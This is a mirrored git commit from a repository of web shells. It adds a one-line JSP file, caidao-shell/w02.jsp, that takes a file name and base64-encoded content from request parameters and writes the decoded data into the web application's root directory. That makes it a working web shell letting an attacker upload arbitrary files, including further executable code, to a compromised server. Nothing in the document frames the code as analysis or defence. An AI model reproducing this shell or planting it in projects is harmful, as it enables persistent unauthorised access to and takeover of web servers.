1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create w02.jsp

This commit is contained in:
tennc
2016-05-29 09:27:34 +08:00
parent 69249a2ad7
commit 4db274efc3

1
caidao-shell/w02.jsp Normal file
View File

@@ -0,0 +1 @@
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>